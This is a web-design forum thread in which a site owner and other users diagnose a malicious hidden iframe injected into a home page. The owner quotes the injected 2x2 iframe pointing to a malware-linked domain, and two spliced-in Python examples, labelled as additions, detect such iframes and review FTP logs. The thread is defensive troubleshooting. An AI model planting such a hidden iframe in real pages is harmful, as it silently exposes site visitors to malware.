  1. #1
    Join Date
    May 2013
    Location
    Australia
    Posts
    8

    Locating hidden exploit code within a home page design

    I appear to have a rogue piece of code that has somehow inserted itself into my current website design and I am unable to find where it would be hiding. Whenever I view the page in a browser my security software comes up with this warning

    Exploit:HTML/IframeRef.DM

    The AV software cleans it from the cache but as soon as I reload the page of course it is back again

    I have tried to back track as to where it would have first appeared and all I can think of is when I tried to include a FormSite form into a placeholder on my home page - but this is a wild guess. I have deleted the placeholder for this and as far as I know the associated <iframe> placeholder also.

    The images I am using on the site are a combination of in house photos and some that I have purchased from 123RF which I would expect would be free of malicious code.

    I also played with the Facebook widget too but have since deleted it as well.

    So far I have trawled the page for possible locations but no luck.

    Looking at the source code of the page I find at the very bottom of all the code..

    <!--[if lt IE 7]><script type="text/javascript" src="index_htm_files/png.js"></script><![endif]-->
    <script type="text/javascript">xr_aeh()</script>
    <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?i=1353323></iframe></body>
    </html>

    Where is this hiding?

    Anyone have any experience with how I would go about finding what this code has attached itself to?

    Cheers

  2. #2
    Join Date
    Sep 2005
    Location
    London, England
    Posts
    520

    Re: Locating hidden exploit code within a home page design

    It would appear to be something to do with the Twitter iframe. The URL in that triggers my anti virus.

  3. #3
    Join Date
    May 2013
    Location
    Jacksonville Florida
    Posts
    95

    Re: Locating hidden exploit code within a home page design

    Does it happen on your computer when you visit any other web pages? Is the AV that comes up your anti virus or a FAKE AV? There are some of those around associated with Twitter and Facebook.
    Thanks Jim

    I love to Bully Pixels

  4. #4
    Join Date
    May 2013
    Location
    Australia
    Posts
    8

    Re: Locating hidden exploit code within a home page design

    I only played with inserting a Facebook widget into the home page as well as embedding a feedback form that I have stored on FormSite. I was able to get the Facebook widget to work, however with the embedded form I first received the AV notice when I tried to use it live on my site.

    My AV is Microsoft Security Essentials and Malware Bytes.

    I don't know where that iframe is hiding though - I have even painstakingly deleted all the body content on the home page and then dragged the mouse over the resulting blank page. It took a few passes but I found 2 small hidden frames which I deleted and then put the page back together again.

    I uploaded the home page again and it all seemed to work fine till this morning when it would not only bring up the AV warning but also no graphics on the page would load.

    I don't get any warning when I browse the internet - only if I attempt to reload my own webpage.

    The source code mentions png.js - I assume that is the culprit and the Twitter iframe is inside that. Is there a way in Xara to display all iframes or scripts that are a part of a page?

    Thanks for the help.

  5. #5

    Re: Locating hidden exploit code within a home page design

    It is more likely that the code injection is occurring on the server after you have published.
    To test this, publish a new totally empty page.

    The xara png.js is for older versions of IE to show alpha channel png images, nothing to do with twitter or iframes.

  6. #6
    Join Date
    May 2013
    Location
    Australia
    Posts
    8

    Re: Locating hidden exploit code within a home page design

    I have deleted the index_htm file folder, then uploaded a blank page - no AV notice. I then uploaded a single Xara template page that didn't upset the AV software either. Now I have uploaded the original .web file and will wait to see what happens.

    I had tried deleting all the files and folders on the web server previously and the exploit didn't appear immediately - worked ok that night but next morning site was broken.

    Cheers

  7. #7
    Join Date
    Apr 2010
    Location
    Kildare, Ireland
    Posts
    906

    Re: Locating hidden exploit code within a home page design

    Did you remove this as suggested?
    <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?i=1353323></iframe>
    As it's at the bottom of your page code the first place I would check is in Web Properties -> Website tab -> Html Code (body). And also check any placeholders.

    If you can't find the code when editing in Xara, try exporting the website locally and when you view the exported source is the offending code there? And does it match exactly with the source of the online page? If not you might have some malicious script on your website that's modifying the uploaded files and you should change your ftp password and search for any dodgy files and remove them and then upload your site again.
    XT-CMS - a self-hosted CMS for Xara Designers - Xara + CMS Demo with blog & ecommerce shopping cart system.
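
The comparison suggested in the post above (exported source versus the page the server actually returns), as an added example that is not part of the original thread. The two HTML strings are constructed from the snippet in the first post; the function names and the 5-pixel threshold are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed samples: the local export, and the same page as served.
LOCAL_EXPORT = """<html><body><p>Home</p>
<!--[if lt IE 7]><script type="text/javascript" src="index_htm_files/png.js"></script><![endif]-->
<script type="text/javascript">xr_aeh()</script>
</body></html>"""
SERVED_COPY = LOCAL_EXPORT.replace(
    "</body>",
    "<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 "
    "width=2 src=http://kozijnen.com/czof.html?i=1353323></iframe></body>")

class EmbedCollector(HTMLParser):
    """Collects every <iframe> and every external <script src=...>."""
    def __init__(self):
        super().__init__()
        self.embeds = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" or (tag == "script" and a.get("src")):
            self.embeds.append((tag, a.get("src") or "", a))

def collect(html):
    parser = EmbedCollector()
    parser.feed(html)
    return parser.embeds

def _px(value):
    digits = (value or "").strip().rstrip("px")
    return int(digits) if digits.isdigit() else None

def injected_embeds(local_html, served_html, tiny_px=5):
    """Return embeds present in the served page but absent from the export."""
    known = {(tag, src) for tag, src, _ in collect(local_html)}
    findings = []
    for tag, src, attrs in collect(served_html):
        if (tag, src) in known:
            continue  # this embed was published by the author
        w, h = _px(attrs.get("width")), _px(attrs.get("height"))
        tiny = w is not None and h is not None and max(w, h) <= tiny_px
        findings.append({"tag": tag, "src": src,
                         "host": urlparse(src).hostname, "tiny": tiny})
    return findings

if __name__ == "__main__":
    for finding in injected_embeds(LOCAL_EXPORT, SERVED_COPY):
        print(finding)
```

Any finding means the file changed after publishing, which points at the server or the upload credentials rather than the design file.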

  8. #8
    Join Date
    Sep 2005
    Location
    London, England
    Posts
    520

    Re: Locating hidden exploit code within a home page design

    Originally posted by jim64:
    Does it happen on your computer when you visit any other web pages? Is the AV that comes up your anti virus or a FAKE AV? There are some of those around associated with Twitter and Facebook.

    Yes it does happen occasionally. The AV warning is from my Bitdefender anti phishing toolbar.

    It certainly looks like you have something resident on your server that is generating the malicious code. If you Google around, kozijnen.com does seem to be associated with malware.

  9. #9
    Join Date
    Jul 2008
    Location
    Phoenix, AZ
    Posts
    267

    Re: Locating hidden exploit code within a home page design

    It's also possible that your ftp login has been compromised. You may want to change it or if you have access, review your ftp log to see who's been logging in, it should note the IPs of people uploading/downloading files. If you see a strange IP there, change your password.
    Chris
    LotsMoreHosting.com
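
One way to do the FTP log review suggested in the post above, as an added example that is not part of the original thread. It assumes the host writes transfers in the classic xferlog layout (18 space-separated fields); the log lines, the user name and the addresses are constructed, and a hosting provider's log may use a different format.

```python
# Constructed sample in the classic xferlog layout.
# Hosts are documentation addresses; "siteuser" and the paths are made up.
SAMPLE_LOG = """\
Mon May 13 09:12:44 2013 2 198.51.100.23 18432 /public_html/index.htm b _ i r siteuser ftp 0 * c
Mon May 13 09:12:47 2013 1 198.51.100.23 2210 /public_html/index_htm_files/png.js b _ i r siteuser ftp 0 * c
Tue May 14 03:41:02 2013 1 203.0.113.77 18561 /public_html/index.htm a _ i r siteuser ftp 0 * c
Tue May 14 08:05:19 2013 1 198.51.100.23 18432 /public_html/index.htm b _ o r siteuser ftp 0 * c
"""

PAGE_SUFFIXES = (".htm", ".html", ".php", ".js")

def parse_xferlog(text):
    """Yield one dict per well-formed transfer record."""
    for line in text.splitlines():
        f = line.split()
        if len(f) != 18:
            continue  # not a transfer record this parser understands
        yield {
            "when": " ".join(f[0:5]),
            "host": f[6],
            "path": f[8],
            "direction": f[11],        # i = upload to server, o = download
            "user": f[13],
            "complete": f[17] == "c",  # c = complete, i = incomplete
        }

def uploads_from_unknown_hosts(text, known_hosts):
    """Completed uploads of page or script files from unrecognised hosts."""
    return [
        r for r in parse_xferlog(text)
        if r["direction"] == "i" and r["complete"]
        and r["path"].lower().endswith(PAGE_SUFFIXES)
        and r["host"] not in known_hosts
    ]

if __name__ == "__main__":
    # known_hosts: the addresses you normally publish from (assumed value).
    for r in uploads_from_unknown_hosts(SAMPLE_LOG, {"198.51.100.23"}):
        print(r["when"], r["host"], r["user"], r["path"])
```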

  10. #10
    Join Date
    Jan 2013
    Posts
    17

    Re: Locating hidden exploit code within a home page design

    Are you by any chance using FileZilla to upload your sites?
    I was once told that it stores passwords without encryption and that hackers can get the passwords very easily when using torrents and such...
